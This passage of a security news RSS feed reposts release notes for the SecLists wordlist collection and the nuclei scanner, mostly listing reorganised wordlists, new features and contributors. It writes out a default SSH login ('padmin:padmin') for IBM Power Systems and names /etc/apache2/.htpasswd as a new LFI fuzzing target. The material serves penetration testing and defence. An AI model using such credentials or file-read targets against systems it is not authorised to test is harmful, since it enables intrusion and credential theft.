<li>📖 feat(docs): Added link descriptions to associated projects and tools in main README - ItsIgnacioPortal</li>
<li>📖 feat(docs): Added warning to CONTRIBUTING.md about uploading data breaches - ItsIgnacioPortal</li>
<li>📖 feat(docs): Improved formatting for 'dsstorewordlist.txt' docs - ItsIgnacioPortal</li>
</ul>
<h2>🪦 Removed content</h2>
<ul>
<li>🪦 chore(wordlist): Removed 'UserPassCombo-Jay.txt' wordlist - ItsIgnacioPortal</li>
<li>🪦 chore(wordlist): Removed duplicate pwdb 'Frequent-Passwords' - ItsIgnacioPortal</li>
</ul>
<h2>🌐 Other changes</h2>
<ul>
<li>🌐 [Github Action] Automated readme update. - github-actions[bot]</li>
<li>🌐 [Github Action] Automated trickest wordlists update. - github-actions[bot]</li>
<li>🌐 [Github Action] Updated combined_directories.txt - github-actions[bot]</li>
<li>🌐 [Github Action] Updated combined_words.txt - github-actions[bot]</li>
<li>🌐 chore(wordlist): Moved 'Dutch_passwordlist.txt' into the 'Common-Credentials/Language-Specific' directory - ItsIgnacioPortal</li>
<li>🌐 chore(wordlist): Moved all words wordlists into the same directory (PR <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3000819552" data-permission-text="Title is private" data-url="https://github.com/danielmiessler/SecLists/issues/1193" data-hovercard-type="pull_request" data-hovercard-url="/danielmiessler/SecLists/pull/1193/hovercard" href="https://github.com/danielmiessler/SecLists/pull/1193">#1193</a>) - ItsIgnacioPortal</li>
<li>🌐 chore(wordlist): Moved darkweb2017* wordlists into the Common-Credentials directory - ItsIgnacioPortal</li>
<li>🌐 chore(wordlist): Moved Dutch-words.txt into /Miscellaneous/Words/ - ItsIgnacioPortal</li>
<li>🌐 chore(wordlist): Moved EFF-Dice into /Miscellaneous/Words/ - ItsIgnacioPortal</li>
<li>🌐 chore(wordlist): Moved french passwords wordlists into the Language-Specific directory - ItsIgnacioPortal</li>
<li>🌐 chore(wordlist): Moved German-words.txt into /Miscellaneous/Words/ - ItsIgnacioPortal</li>
<li>🌐 chore(wordlist): Moved moby project files into their own directory - ItsIgnacioPortal</li>
<li>🌐 chore(wordlist): Moved Moby-Project into /Miscellaneous/Words/ - ItsIgnacioPortal</li>
<li>🌐 chore(wordlist): Moved probable-v2* wordlists into the Common-Credentials directory - ItsIgnacioPortal</li>
<li>🌐 chore(wordlist): Moved pwdb passwords wordlists into the Common-Credentials directory - ItsIgnacioPortal</li>
<li>🌐 chore(wordlist): Moved Pwdb-Public Language-Specific wordlists into the Language-Specifics directory - ItsIgnacioPortal</li>
<li>🌐 chore(wordlist): Renamed darkweb files - ItsIgnacioPortal</li>
<li>🌐 chore(wordlist): Renamed probable-v2 files - ItsIgnacioPortal</li>
<li>🌐 chore(wordlist): Renamed pwdb language-specific wordlists - ItsIgnacioPortal</li>
<li>🌐 chore(wordlist): Renamed pwdb password wordlists - ItsIgnacioPortal</li>
<li>🌐 chore(cicd): Temporarily disabled the 'wordlist-validator.yml' workflow - ItsIgnacioPortal</li>
<li>🌐 feat(cicd): Added more workflow_dispatch event triggers - ItsIgnacioPortal</li>
</ul>
<p>Shout-out to: <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MachiavelliII/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MachiavelliII">@MachiavelliII</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/CYFARE/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/CYFARE">@CYFARE</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BuildAndDestroy/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BuildAndDestroy">@BuildAndDestroy</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/righettod/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/righettod">@righettod</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bl13pbl03p/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bl13pbl03p">@bl13pbl03p</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zar3bski/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zar3bski">@zar3bski</a>, and "jvardikar".</p>
<p>🥇 Thank you everyone &lt;3</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[2025.3]]></title>
<description><![CDATA[Important changes
📛 Deprecated DirBuster wordlists
The dirbuster wordlists were made in 2007, and are now considered obsolete. Instead, these wordlists are recommended for testing modern web environments:

Discovery/Web-Content/combined_words.txt
Discovery/Web-Content/combined_directories.txt

Bo...]]></description>
<link>https://tsecurity.de/de/3487883/it-security-tools/20253/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3487883/it-security-tools/20253/</guid>
<pubDate>Tue, 05 May 2026 02:20:44 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h1>Important changes</h1>
<h2>📛 Deprecated DirBuster wordlists</h2>
<p>The dirbuster wordlists were made in 2007, and are now considered obsolete. Instead, these wordlists are recommended for testing modern web environments:</p>
<ul>
<li>Discovery/Web-Content/combined_words.txt</li>
<li>Discovery/Web-Content/combined_directories.txt</li>
</ul>
<p>Both of these wordlists are composed of various other wordlists in that same directory, and are automatically updated whenever one of their components is modified. For more information see the README.md for Discovery/Web-Content.</p>
<p>The dirbuster wordlists will remain contained in SecLists, but they now have the <code>DirBuster-2007</code> prefix to highlight their age.</p>
<hr>
<h2>📛 Dangerous SQLi payloads</h2>
<p>The SQL Injection wordlists contained in Fuzzing/Databases/SQLi are <strong>not safe to use</strong> on production environments. Many of those wordlists contain potentially destructive queries which may permanently delete data on any databases they're used on. A warning has been added to the <code>README.md</code> for that directory. For more information see issue <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2251086489" data-permission-text="Title is private" data-url="https://github.com/danielmiessler/SecLists/issues/1011" data-hovercard-type="issue" data-hovercard-url="/danielmiessler/SecLists/issues/1011/hovercard" href="https://github.com/danielmiessler/SecLists/issues/1011">#1011</a></p>
<hr>
<h1>New content</h1>
<ul>
<li>✨ feat(wordlist): Created Active Directory wordlist (PR <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3189292761" data-permission-text="Title is private" data-url="https://github.com/danielmiessler/SecLists/issues/1224" data-hovercard-type="pull_request" data-hovercard-url="/danielmiessler/SecLists/pull/1224/hovercard" href="https://github.com/danielmiessler/SecLists/pull/1224">#1224</a>)</li>
<li>✨ feat(docs): Added "GENOVEVA" tool to readme (PR <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3036007587" data-permission-text="Title is private" data-url="https://github.com/danielmiessler/SecLists/issues/1200" data-hovercard-type="pull_request" data-hovercard-url="/danielmiessler/SecLists/pull/1200/hovercard" href="https://github.com/danielmiessler/SecLists/pull/1200">#1200</a>)</li>
<li>✨ feat(docs): Added alternative reference to docs</li>
<li>✨ feat(docs): Added documentation for the 'cirt-net_collection.txt' wordlist</li>
<li>✨ feat(docs): Added documentation for the 'Java-Spring-Boot.txt' wordlist</li>
<li>✨ feat(docs): Added documentation for the 'xato-net-10-million-passwords' wordlists</li>
<li>✨ feat(wordlist): Added 'encryptionkeys' directory to 'common_directories.txt'</li>
<li>✨ feat(wordlist): Added /etc/apache2/.htpasswd to LFI fuzzing lists (PR <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3177700758" data-permission-text="Title is private" data-url="https://github.com/danielmiessler/SecLists/issues/1223" data-hovercard-type="pull_request" data-hovercard-url="/danielmiessler/SecLists/pull/1223/hovercard" href="https://github.com/danielmiessler/SecLists/pull/1223">#1223</a>)</li>
<li>✨ feat(wordlist): Added a dictionary for Model Context Protocol server discovery. (PR <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3149821035" data-permission-text="Title is private" data-url="https://github.com/danielmiessler/SecLists/issues/1216" data-hovercard-type="pull_request" data-hovercard-url="/danielmiessler/SecLists/pull/1216/hovercard" href="https://github.com/danielmiessler/SecLists/pull/1216">#1216</a>)</li>
<li>✨ feat(wordlist): Added common Spanish names and words (PR <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3033889316" data-permission-text="Title is private" data-url="https://github.com/danielmiessler/SecLists/issues/1199" data-hovercard-type="pull_request" data-hovercard-url="/danielmiessler/SecLists/pull/1199/hovercard" href="https://github.com/danielmiessler/SecLists/pull/1199">#1199</a>)</li>
<li>✨ feat(wordlist): Added default SSH password "padmin:padmin" for IBM Power Systems (PR <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3134578875" data-permission-text="Title is private" data-url="https://github.com/danielmiessler/SecLists/issues/1211" data-hovercard-type="pull_request" data-hovercard-url="/danielmiessler/SecLists/pull/1211/hovercard" href="https://github.com/danielmiessler/SecLists/pull/1211">#1211</a>)</li>
<li>✨ feat(wordlist): Added IANA mime-types to "web-all-content-types.txt" (PR <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3088789363" data-permission-text="Title is private" data-url="https://github.com/danielmiessler/SecLists/issues/1204" data-hovercard-type="pull_request" data-hovercard-url="/danielmiessler/SecLists/pull/1204/hovercard" href="https://github.com/danielmiessler/SecLists/pull/1204">#1204</a>)</li>
<li>✨ feat(wordlist): Added mcp-server.txt entries to common.txt</li>
<li>✨ feat(wordlist): Added more OBEX common filenames and cleaned OBEX wordlists (PR <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3417694508" data-permission-text="Title is private" data-url="https://github.com/danielmiessler/SecLists/issues/1249" data-hovercard-type="pull_request" data-hovercard-url="/danielmiessler/SecLists/pull/1249/hovercard" href="https://github.com/danielmiessler/SecLists/pull/1249">#1249</a>)</li>
<li>✨ feat(wordlist): Added more permutations to 'common_directories.txt'</li>
<li>✨ feat(wordlist): Added more swagger endpoints (PR <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3169275806" data-permission-text="Title is private" data-url="https://github.com/danielmiessler/SecLists/issues/1219" data-hovercard-type="pull_request" data-hovercard-url="/danielmiessler/SecLists/pull/1219/hovercard" href="https://github.com/danielmiessler/SecLists/pull/1219">#1219</a>)</li>
<li>✨ feat(wordlist): Added new payload to 'SAP' wordlist (PR <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3025460528" data-permission-text="Title is private" data-url="https://github.com/danielmiessler/SecLists/issues/1196" data-hovercard-type="pull_request" data-hovercard-url="/danielmiessler/SecLists/pull/1196/hovercard" href="https://github.com/danielmiessler/SecLists/pull/1196">#1196</a>)</li>
<li>✨ feat(wordlist): Added prefixes to deal with Java-Spring-Boot being behind spring-cloud-gateway (PR <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3169330438" data-permission-text="Title is private" data-url="https://github.com/danielmiessler/SecLists/issues/1220" data-hovercard-type="pull_request" data-hovercard-url="/danielmiessler/SecLists/pull/1220/hovercard" href="https://github.com/danielmiessler/SecLists/pull/1220">#1220</a>)</li>
<li>✨ feat(wordlist): Added Quectel to default-passwords.csv + updated default-passwords.txt (PR <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3120442541" data-permission-text="Title is private" data-url="https://github.com/danielmiessler/SecLists/issues/1208" data-hovercard-type="pull_request" data-hovercard-url="/danielmiessler/SecLists/pull/1208/hovercard" href="https://github.com/danielmiessler/SecLists/pull/1208">#1208</a>)</li>
<li>✨ feat(wordlist): Added readme.md to "Discovery/Web-Content/big.txt" (PR <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3410684886" data-permission-text="Title is private" data-url="https://github.com/danielmiessler/SecLists/issues/1248" data-hovercard-type="pull_request" data-hovercard-url="/danielmiessler/SecLists/pull/1248/hovercard" href="https://github.com/danielmiessler/SecLists/pull/1248">#1248</a>)</li>
<li>✨ feat(wordlist): Added YYYY-MM-DD dates wordlists (PR <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3163337900" data-permission-text="Title is private" data-url="https://github.com/danielmiessler/SecLists/issues/1217" data-hovercard-type="pull_request" data-hovercard-url="/danielmiessler/SecLists/pull/1217/hovercard" href="https://github.com/danielmiessler/SecLists/pull/1217">#1217</a>)</li>
</ul>
<h1>Other changes</h1>
<ul>
<li>🐛 fix(wordlist): Added 'DirBuster-2007' prefix to all DirBuster wordlists</li>
<li>🐛 fix(cicd): Removed trailing spaces from wordlist-updater_default-passwords.yml (PR <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3373780846" data-permission-text="Title is private" data-url="https://github.com/danielmiessler/SecLists/issues/1243" data-hovercard-type="pull_request" data-hovercard-url="/danielmiessler/SecLists/pull/1243/hovercard" href="https://github.com/danielmiessler/SecLists/pull/1243">#1243</a>)</li>
<li>🐛 fix(cicd): Updated paths in the 'Wordlist Updater - Combined directories' pipeline</li>
<li>🐛 fix(docs): Updated filenames that compose 'combined_directories.txt'</li>
<li>🐛 fix(wordlist): Cleaned up '100k-most-used-passwords-NCSC.txt' (PR <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3252347532" data-permission-text="Title is private" data-url="https://github.com/danielmiessler/SecLists/issues/1235" data-hovercard-type="pull_request" data-hovercard-url="/danielmiessler/SecLists/pull/1235/hovercard" href="https://github.com/danielmiessler/SecLists/pull/1235">#1235</a>)</li>
<li>🐛 fix(wordlist): Fixed encoding in "100k-most-used-passwords-NCSC.txt" (PR <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3215204333" data-permission-text="Title is private" data-url="https://github.com/danielmiessler/SecLists/issues/1226" data-hovercard-type="pull_request" data-hovercard-url="/danielmiessler/SecLists/pull/1226/hovercard" href="https://github.com/danielmiessler/SecLists/pull/1226">#1226</a>)</li>
<li>🐛 fix(wordlist): Updated curl-protocols wordlist (PR <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3304516175" data-permission-text="Title is private" data-url="https://github.com/danielmiessler/SecLists/issues/1237" data-hovercard-type="pull_request" data-hovercard-url="/danielmiessler/SecLists/pull/1237/hovercard" href="https://github.com/danielmiessler/SecLists/pull/1237">#1237</a>)</li>
<li>🔧 chore(wordlist): Moved 'curl-protocols.txt' wordlist to the 'Fuzzing' directory</li>
</ul>
<h2>New Contributors</h2>
<ul>
<li>@GoombaProgrammer made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3031687814" data-permission-text="Title is private" data-url="https://github.com/danielmiessler/SecLists/issues/1198" data-hovercard-type="pull_request" data-hovercard-url="/danielmiessler/SecLists/pull/1198/hovercard" href="https://github.com/danielmiessler/SecLists/pull/1198">#1198</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joseaguardia/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joseaguardia">@joseaguardia</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3033889316" data-permission-text="Title is private" data-url="https://github.com/danielmiessler/SecLists/issues/1199" data-hovercard-type="pull_request" data-hovercard-url="/danielmiessler/SecLists/pull/1199/hovercard" href="https://github.com/danielmiessler/SecLists/pull/1199">#1199</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/theclayton/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/theclayton">@theclayton</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3088789363" data-permission-text="Title is private" data-url="https://github.com/danielmiessler/SecLists/issues/1204" data-hovercard-type="pull_request" data-hovercard-url="/danielmiessler/SecLists/pull/1204/hovercard" href="https://github.com/danielmiessler/SecLists/pull/1204">#1204</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rtfmkiesel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rtfmkiesel">@rtfmkiesel</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3120442541" data-permission-text="Title is private" data-url="https://github.com/danielmiessler/SecLists/issues/1208" data-hovercard-type="pull_request" data-hovercard-url="/danielmiessler/SecLists/pull/1208/hovercard" href="https://github.com/danielmiessler/SecLists/pull/1208">#1208</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DaddyBigFish/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DaddyBigFish">@DaddyBigFish</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3163337900" data-permission-text="Title is private" data-url="https://github.com/danielmiessler/SecLists/issues/1217" data-hovercard-type="pull_request" data-hovercard-url="/danielmiessler/SecLists/pull/1217/hovercard" href="https://github.com/danielmiessler/SecLists/pull/1217">#1217</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/psytester/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/psytester">@psytester</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3169275806" data-permission-text="Title is private" data-url="https://github.com/danielmiessler/SecLists/issues/1219" data-hovercard-type="pull_request" data-hovercard-url="/danielmiessler/SecLists/pull/1219/hovercard" href="https://github.com/danielmiessler/SecLists/pull/1219">#1219</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Jhayrolandero/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Jhayrolandero">@Jhayrolandero</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3177700758" data-permission-text="Title is private" data-url="https://github.com/danielmiessler/SecLists/issues/1223" data-hovercard-type="pull_request" data-hovercard-url="/danielmiessler/SecLists/pull/1223/hovercard" href="https://github.com/danielmiessler/SecLists/pull/1223">#1223</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kennystrawnmusic/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kennystrawnmusic">@kennystrawnmusic</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3189292761" data-permission-text="Title is private" data-url="https://github.com/danielmiessler/SecLists/issues/1224" data-hovercard-type="pull_request" data-hovercard-url="/danielmiessler/SecLists/pull/1224/hovercard" href="https://github.com/danielmiessler/SecLists/pull/1224">#1224</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/liamjones/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/liamjones">@liamjones</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3215204333" data-permission-text="Title is private" data-url="https://github.com/danielmiessler/SecLists/issues/1226" data-hovercard-type="pull_request" data-hovercard-url="/danielmiessler/SecLists/pull/1226/hovercard" href="https://github.com/danielmiessler/SecLists/pull/1226">#1226</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/evilgensec/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/evilgensec">@evilgensec</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3252347532" data-permission-text="Title is private" data-url="https://github.com/danielmiessler/SecLists/issues/1235" data-hovercard-type="pull_request" data-hovercard-url="/danielmiessler/SecLists/pull/1235/hovercard" href="https://github.com/danielmiessler/SecLists/pull/1235">#1235</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/robinkarlberg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/robinkarlberg">@robinkarlberg</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3304516175" data-permission-text="Title is private" data-url="https://github.com/danielmiessler/SecLists/issues/1237" data-hovercard-type="pull_request" data-hovercard-url="/danielmiessler/SecLists/pull/1237/hovercard" href="https://github.com/danielmiessler/SecLists/pull/1237">#1237</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Sh3b0/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Sh3b0">@Sh3b0</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3373780846" data-permission-text="Title is private" data-url="https://github.com/danielmiessler/SecLists/issues/1243" data-hovercard-type="pull_request" data-hovercard-url="/danielmiessler/SecLists/pull/1243/hovercard" href="https://github.com/danielmiessler/SecLists/pull/1243">#1243</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/totobarbar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/totobarbar">@totobarbar</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3410684886" data-permission-text="Title is private" data-url="https://github.com/danielmiessler/SecLists/issues/1248" data-hovercard-type="pull_request" data-hovercard-url="/danielmiessler/SecLists/pull/1248/hovercard" href="https://github.com/danielmiessler/SecLists/pull/1248">#1248</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/danielmiessler/SecLists/compare/2025.2...2025.3"><tt>2025.2...2025.3</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[v3.5.0]]></title>
<description><![CDATA[What's Changed
🎉 New Features

Adding json + xpath headless extractors by @Mzack9999 in #6559
Adding VNC auth by @Mzack9999 in #6413
Feat(templating): add vars templating into yaml inputs (ytt) by @alban-stourbe-wmx in #6261
Feat: added new text/template syntax to jira custom fields by @Ice3man54...]]></description>
<link>https://tsecurity.de/de/3487869/it-security-tools/v350/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3487869/it-security-tools/v350/</guid>
<pubDate>Tue, 05 May 2026 02:20:25 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>What's Changed</h2>
<h2>🎉 New Features</h2>
<ul>
<li>Adding json + xpath headless extractors by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Mzack9999/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Mzack9999">@Mzack9999</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3560803861" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/6559" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6559/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/6559">#6559</a></li>
<li>Adding VNC auth by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Mzack9999/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Mzack9999">@Mzack9999</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3343033255" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/6413" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6413/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/6413">#6413</a></li>
<li>Feat(templating): add vars templating into yaml inputs (ytt) by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alban-stourbe-wmx/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alban-stourbe-wmx">@alban-stourbe-wmx</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3140294168" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/6261" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6261/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/6261">#6261</a></li>
<li>Feat: added new text/template syntax to jira custom fields by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Ice3man543/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Ice3man543">@Ice3man543</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3402061341" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/6464" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6464/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/6464">#6464</a></li>
<li>Feat(fuzz): enhance <code>MultiPartForm</code> with metadata APIs by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dwisiswant0/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dwisiswant0">@dwisiswant0</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3430256105" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/6486" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6486/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/6486">#6486</a></li>
<li>Feat: http(s) probing optimization by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/matejsmycka/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/matejsmycka">@matejsmycka</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3486744926" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/6511" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6511/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/6511">#6511</a></li>
<li>Add option to control number of concurrent templates loaded on startup by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mielverkerken/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mielverkerken">@mielverkerken</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3303789757" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/6373" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6373/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/6373">#6373</a></li>
<li>CheckRDPEncryption function by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pussycat0x/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pussycat0x">@pussycat0x</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3033818359" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/6204" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6204/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/6204">#6204</a></li>
<li>SSH keyboard-interactive by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/chovanecadam/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/chovanecadam">@chovanecadam</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3481917109" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/6508" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6508/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/6508">#6508</a></li>
<li>Feat(templates): add file metadata fields to <code>parsedTemplate</code> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dwisiswant0/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dwisiswant0">@dwisiswant0</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3513761393" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/6534" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6534/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/6534">#6534</a></li>
<li>Add env variable for nuclei templates dir by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dogancanbakir/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dogancanbakir">@dogancanbakir</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3591572773" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/6588" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6588/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/6588">#6588</a></li>
<li>Adding support for execution in docker by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Mzack9999/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Mzack9999">@Mzack9999</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3550927440" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/6549" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6549/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/6549">#6549</a></li>
</ul>
<h2>🐞 Bug Fixes</h2>
<ul>
<li>Clean up pools after 24hours inactivity by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Mzack9999/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Mzack9999">@Mzack9999</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3536376670" data-permission-text="Title is private" data-url="https://github.com/projectdiscovery/nuclei/issues/6545" data-hovercard-type="pull_request" data-hovercard-url="/projectdiscovery/nuclei/pull/6545/hovercard" href="https://github.com/projectdiscovery/nuclei/pull/6545">#6545</a></li>
